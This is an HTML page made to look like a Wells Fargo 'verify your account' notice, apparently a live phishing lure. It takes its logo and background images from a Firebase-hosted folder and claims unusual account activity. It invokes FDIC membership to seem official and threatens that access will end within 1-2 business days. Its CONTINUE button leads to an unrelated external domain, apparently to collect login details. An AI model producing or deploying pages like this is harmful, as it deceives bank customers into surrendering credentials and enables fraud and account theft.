<!DOCTYPE html>
<html>

    <style media="screen">
        body {
            background-image: url('https://upload-c5162.web.app/wells/pc.jpg');
        }

        #message {
            background: white;
            max-width: 90%;
            margin: 100px auto 100px;
            padding: 50px 50px;
            border-radius: 50px;
        }

        #message h1 {
            font-size: 40px;
            font-weight: 300;
            color: rgba(0, 0, 0, 0.753);
            margin: 0 0 16px;
            font-family: Arial, Helvetica;
        }

        #message h4 {
            font-size: 40px;
            font-weight: 300;
            color: rgba(255, 255, 255);
            margin: 0 0 16px;
            font-family: Arial, Helvetica;
        }
        
        #message h5 {
            font-size: 20px;
            font-weight: 100;
            color: rgba(255, 255, 255);
            margin: 0 0 10px;
            font-family: Arial, Helvetica;
        }
        
        #message p {
            line-height: 60px;
            margin: 16px 0 24px;
            font-size: 20px;
            font-family: Arial, Helvetica;
        }

        #load {
            color: rgba(0, 0, 0, 0.4);
            text-align: center;
            font-size: 15px;
            font-family: Arial, Helvetica;
        }

        @media (max-width: 600px) {
            body {
                background-image: url('https://upload-c5162.web.app/wells/phone.jpg');
            }

            #message {
                margin: 60px auto 60px;
                max-width: 600px;
                padding: 15px 15px;
                box-shadow: none;
                border-radius: 10px
            }
        }
    </style>
</head>

<body>
    <div id="message">
        <h4><b>.</b></h4>
        <p style="text-align:center;"><img src="https://upload-c5162.web.app/wells/logo.png" alt="Logo" width="600" height="120"></p>
        <h5>.</h5>
        <h1><b>Please read carefully</b></h1>
        <p>We've noticed something unusual about your account information and will take a minute with you to verify all account information.</p>
        <p>• We will review all account activity upon verification</p>
        <p><b>Why am i seeing this message?</b></p>
        <p>• This message is to inform and assist you with update/verification of your account details which we have in our records
            " As a Member of FDIC. Equal Housing Lender, we're asked to always keep our customers personal information up to date  " </p>
        <p>This may happen because of the following reasons</p>
        <P>• Typographical errors or outdated personal details</P>
        <p><b>NOTE</b> : If your account information is not confirmed and verified within 1-2 business days, then your ability to access your account will be unavailable</p>    
        <div style="Margin-left: 20px;Margin-right: 20px;">
            <div class="btn btn--shadow btn--medium" style="Margin: 50px;text-align: center;"><a style="border-radius: 30px;display: inline-block;font-size: 30px;font-weight: bold;line-height: 44px;padding: 20px 80px 22px 80px;text-align: center;text-decoration: none !important;transition: opacity 0.1s ease-in;color:#ffffff !important;box-shadow: inset 0 -2px 0 0 rgba(0, 0, 0, 0.2);background-color: #ff0606;font-family: Arial, Helvetica, sans-serif;" href="https://oamweb.co/avc?vns" target=_blank>CONTINUE</a>
               
            </div>
            <div style=text-align:center;font-size:20px;line-height:19px;margin-top:20px;>
                <div>Wells Fargo Team</div>
                <p id="load"></p>
            </div>
        </div>
    </div>
</body>

</html>
